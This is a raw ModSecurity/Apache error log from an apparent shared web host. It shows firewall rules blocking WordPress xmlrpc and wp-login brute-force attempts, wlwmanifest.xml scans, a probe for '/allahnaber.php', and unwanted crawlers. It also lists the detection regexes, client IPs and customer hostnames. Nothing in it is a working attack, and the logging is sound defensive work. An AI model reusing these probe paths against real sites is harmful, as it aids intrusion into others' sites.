[Tue May 26 15:56:40.293925 2026] [security2:error] [pid 745492:tid 745698] [client 103.153.130.62:62649] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1YImEQglTmoWcfxKQtwAAAM4"]
[Tue May 26 15:56:41.336717 2026] [security2:error] [pid 747840:tid 748039] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1YIm6MwAuYuZKxvkLwAAAAU8"]
[Tue May 26 15:56:43.016371 2026] [security2:error] [pid 747840:tid 748062] [client 103.44.52.196:60852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Yom6MwAuYuZKxvkL4AAAAWY"]
[Tue May 26 15:56:43.016550 2026] [security2:error] [pid 747840:tid 748062] [client 103.44.52.196:60852] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Yom6MwAuYuZKxvkL4AAAAWY"]
[Tue May 26 15:56:43.635636 2026] [security2:error] [pid 745492:tid 745718] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1Y4mEQglTmoWcfxKQ2AAAAOI"]
[Tue May 26 15:56:46.056162 2026] [security2:error] [pid 747840:tid 748088] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1ZYm6MwAuYuZKxvkMDwAAAYA"]
[Tue May 26 15:56:48.129773 2026] [security2:error] [pid 747840:tid 748076] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1Z4m6MwAuYuZKxvkMNQAAAXQ"]
[Tue May 26 15:56:49.741198 2026] [security2:error] [pid 747840:tid 748051] [client 106.219.85.83:21836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1aYm6MwAuYuZKxvkMZgAAAVs"]
[Tue May 26 15:56:49.741310 2026] [security2:error] [pid 747840:tid 748051] [client 106.219.85.83:21836] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1aYm6MwAuYuZKxvkMZgAAAVs"]
[Tue May 26 15:56:50.340814 2026] [security2:error] [pid 747840:tid 748054] [client 114.119.139.1:20291] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV1aom6MwAuYuZKxvkMcwAAAV4"], referer: http://glorodavionics.com/beta/index.php?route=product/product&path=72_142_145&product_id=218
[Tue May 26 15:56:50.574767 2026] [security2:error] [pid 747840:tid 748016] [client 103.153.130.62:62919] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1aom6MwAuYuZKxvkMdQAAATg"]
[Tue May 26 15:56:50.574925 2026] [security2:error] [pid 747840:tid 748016] [client 103.153.130.62:62919] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1aom6MwAuYuZKxvkMdQAAATg"]
[Tue May 26 15:56:50.684484 2026] [security2:error] [pid 747840:tid 748055] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1aom6MwAuYuZKxvkMbwAAAV8"]
[Tue May 26 15:56:51.251299 2026] [security2:error] [pid 745492:tid 745625] [client 129.222.126.31:22263] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV1aomEQglTmoWcfxKRHgAAAIU"]
[Tue May 26 15:56:51.543373 2026] [security2:error] [pid 745492:tid 745625] [client 129.222.126.31:22263] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV1aomEQglTmoWcfxKRHgAAAIU"]
[Tue May 26 15:56:51.543438 2026] [security2:error] [pid 745492:tid 745625] [client 129.222.126.31:22263] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV1aomEQglTmoWcfxKRHgAAAIU"]
[Tue May 26 15:56:52.290970 2026] [security2:error] [pid 747840:tid 748003] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1a4m6MwAuYuZKxvkMkQAAASs"]
[Tue May 26 15:56:52.697059 2026] [security2:error] [pid 745492:tid 745683] [client 129.222.126.31:19943] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV1bImEQglTmoWcfxKRPQAAAL8"]
[Tue May 26 15:56:52.767786 2026] [security2:error] [pid 745492:tid 745683] [client 129.222.126.31:19943] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV1bImEQglTmoWcfxKRPQAAAL8"]
[Tue May 26 15:56:53.439478 2026] [security2:error] [pid 745492:tid 745671] [client 103.44.52.196:45016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1bYmEQglTmoWcfxKRSwAAALM"]
[Tue May 26 15:56:53.440414 2026] [security2:error] [pid 745492:tid 745671] [client 103.44.52.196:45016] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1bYmEQglTmoWcfxKRSwAAALM"]
[Tue May 26 15:56:53.993579 2026] [security2:error] [pid 745492:tid 745700] [client 129.222.126.31:27168] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV1bYmEQglTmoWcfxKRVAAAANA"]
[Tue May 26 15:56:54.066202 2026] [security2:error] [pid 745492:tid 745700] [client 129.222.126.31:27168] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV1bYmEQglTmoWcfxKRVAAAANA"]
[Tue May 26 15:56:54.197887 2026] [security2:error] [pid 745492:tid 745703] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1bYmEQglTmoWcfxKRUQAAANM"]
[Tue May 26 15:56:55.373080 2026] [security2:error] [pid 745492:tid 745670] [client 129.222.126.31:65442] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV1b4mEQglTmoWcfxKRbgAAALI"]
[Tue May 26 15:56:55.459867 2026] [security2:error] [pid 745492:tid 745670] [client 129.222.126.31:65442] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV1b4mEQglTmoWcfxKRbgAAALI"]
[Tue May 26 15:56:55.476518 2026] [security2:error] [pid 745492:tid 745630] [client 223.123.125.8:64771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1b4mEQglTmoWcfxKRagAAAIo"]
[Tue May 26 15:56:55.476643 2026] [security2:error] [pid 745492:tid 745630] [client 223.123.125.8:64771] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1b4mEQglTmoWcfxKRagAAAIo"]
[Tue May 26 15:56:56.532272 2026] [security2:error] [pid 745492:tid 745708] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1cImEQglTmoWcfxKRewAAANg"]
[Tue May 26 15:56:56.684299 2026] [security2:error] [pid 745492:tid 745638] [client 129.222.126.31:18883] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV1cImEQglTmoWcfxKRgQAAAJI"]
[Tue May 26 15:56:56.758111 2026] [security2:error] [pid 745492:tid 745638] [client 129.222.126.31:18883] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV1cImEQglTmoWcfxKRgQAAAJI"]
[Tue May 26 15:56:57.585462 2026] [security2:error] [pid 745492:tid 745691] [client 68.183.88.172:55208] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "christinaspromotions.com"] [uri "/"] [unique_id "ahV1cYmEQglTmoWcfxKRmQAAAMc"]
[Tue May 26 15:56:58.777160 2026] [security2:error] [pid 747840:tid 747976] [client 143.110.243.118:41988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/allahnaber.php"] [unique_id "ahV1com6MwAuYuZKxvkM7wAAARA"]
[Tue May 26 15:56:59.061808 2026] [core:crit] [pid 747840:tid 748092] (13)Permission denied: [client 157.55.39.13:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:56:59.063049 2026] [security2:error] [pid 747840:tid 748015] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1com6MwAuYuZKxvkM7gAAATc"]
[Tue May 26 15:56:59.507231 2026] [core:crit] [pid 747840:tid 748074] (13)Permission denied: [client 157.55.39.13:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:57:00.242507 2026] [security2:error] [pid 747840:tid 747991] [client 106.219.85.83:26882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1dIm6MwAuYuZKxvkNAgAAAR8"]
[Tue May 26 15:57:00.242639 2026] [security2:error] [pid 747840:tid 747991] [client 106.219.85.83:26882] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1dIm6MwAuYuZKxvkNAgAAAR8"]
[Tue May 26 15:57:00.576443 2026] [security2:error] [pid 745492:tid 745656] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1dImEQglTmoWcfxKRvQAAAKQ"]
[Tue May 26 15:57:00.900312 2026] [security2:error] [pid 745492:tid 745696] [client 103.153.130.62:63190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1dImEQglTmoWcfxKRzAAAAMw"]
[Tue May 26 15:57:00.900541 2026] [security2:error] [pid 745492:tid 745696] [client 103.153.130.62:63190] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1dImEQglTmoWcfxKRzAAAAMw"]
[Tue May 26 15:57:01.924313 2026] [security2:error] [pid 745492:tid 745703] [client 138.219.122.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1dYmEQglTmoWcfxKR1AAAANM"], referer: https://www.anujtradingco.com/
[Tue May 26 15:57:02.093866 2026] [security2:error] [pid 747840:tid 748045] [client 62.60.130.233:60048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.bramas.in"] [uri "/wp-login.php"] [unique_id "ahV1dYm6MwAuYuZKxvkNJwAAAVU"]
[Tue May 26 15:57:02.193556 2026] [security2:error] [pid 747840:tid 748009] [client 114.119.154.189:40375] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/prespontaneousfefc/abccfc1741816.shtml"] [unique_id "ahV1dom6MwAuYuZKxvkNLgAAATE"], referer: http://ghanemgh.com/prespontaneousfefc/abccfc1741816.shtml
[Tue May 26 15:57:02.433347 2026] [security2:error] [pid 747840:tid 748075] [client 138.84.72.193:65213] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV1dYm6MwAuYuZKxvkNJgAAAXM"], referer: https://www.cagmedya.com/adana-web-tasarim/
[Tue May 26 15:57:02.434162 2026] [security2:error] [pid 747840:tid 748075] [client 62.60.130.233:51796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.bramas.in"] [uri "/wp-login.php"] [unique_id "ahV1dom6MwAuYuZKxvkNMQAAAXM"], referer: https://duckduckgo.com/
[Tue May 26 15:57:02.575080 2026] [security2:error] [pid 747840:tid 748060] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1dom6MwAuYuZKxvkNLQAAAWQ"]
[Tue May 26 15:57:02.878904 2026] [security2:error] [pid 747840:tid 748038] [client 138.219.122.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1dom6MwAuYuZKxvkNOAAAAU4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1467072&moderation-hash=72f44dbcdc0c737e3cf7427fd1cc1d45
[Tue May 26 15:57:03.735756 2026] [security2:error] [pid 745492:tid 745639] [client 223.123.125.8:64774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1d4mEQglTmoWcfxKR5AAAAJM"]
[Tue May 26 15:57:03.735880 2026] [security2:error] [pid 745492:tid 745639] [client 223.123.125.8:64774] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1d4mEQglTmoWcfxKR5AAAAJM"]
[Tue May 26 15:57:03.758510 2026] [security2:error] [pid 747840:tid 748067] [client 190.108.85.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1d4m6MwAuYuZKxvkNRgAAAWs"]
[Tue May 26 15:57:04.058385 2026] [security2:error] [pid 747840:tid 748008] [client 103.44.52.196:54560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1eIm6MwAuYuZKxvkNVQAAATA"]
[Tue May 26 15:57:04.058558 2026] [security2:error] [pid 747840:tid 748008] [client 103.44.52.196:54560] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1eIm6MwAuYuZKxvkNVQAAATA"]
[Tue May 26 15:57:04.661749 2026] [security2:error] [pid 747840:tid 748042] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1eIm6MwAuYuZKxvkNYAAAAVI"]
[Tue May 26 15:57:06.219783 2026] [security2:error] [pid 747840:tid 748035] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1eYm6MwAuYuZKxvkNfwAAAUs"]
[Tue May 26 15:57:06.578293 2026] [core:crit] [pid 747840:tid 747983] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:57:07.424001 2026] [security2:error] [pid 745492:tid 745652] [client 35.199.175.60:51588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.175.199.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/xmlrpc.php"] [unique_id "ahV1e4mEQglTmoWcfxKR_gAAAKA"]
[Tue May 26 15:57:07.602378 2026] [security2:error] [pid 747840:tid 747988] [client 35.199.175.60:60900] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahV1e4m6MwAuYuZKxvkNngAAARw"]
[Tue May 26 15:57:07.786820 2026] [security2:error] [pid 747840:tid 748050] [client 35.199.175.60:55211] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahV1e4m6MwAuYuZKxvkNpAAAAVo"]
[Tue May 26 15:57:07.966095 2026] [security2:error] [pid 747840:tid 747993] [client 35.199.175.60:59241] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahV1e4m6MwAuYuZKxvkNrAAAASE"]
[Tue May 26 15:57:08.218436 2026] [security2:error] [pid 747840:tid 748079] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1e4m6MwAuYuZKxvkNpgAAAXc"]
[Tue May 26 15:57:08.283573 2026] [security2:error] [pid 747840:tid 748001] [client 35.199.175.60:63319] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahV1fIm6MwAuYuZKxvkNsgAAASk"]
[Tue May 26 15:57:08.608246 2026] [security2:error] [pid 745492:tid 745730] [client 35.199.175.60:64680] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahV1fImEQglTmoWcfxKSDAAAAO4"]
[Tue May 26 15:57:08.945900 2026] [security2:error] [pid 747840:tid 748046] [client 35.199.175.60:60172] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahV1fIm6MwAuYuZKxvkNuwAAAVY"]
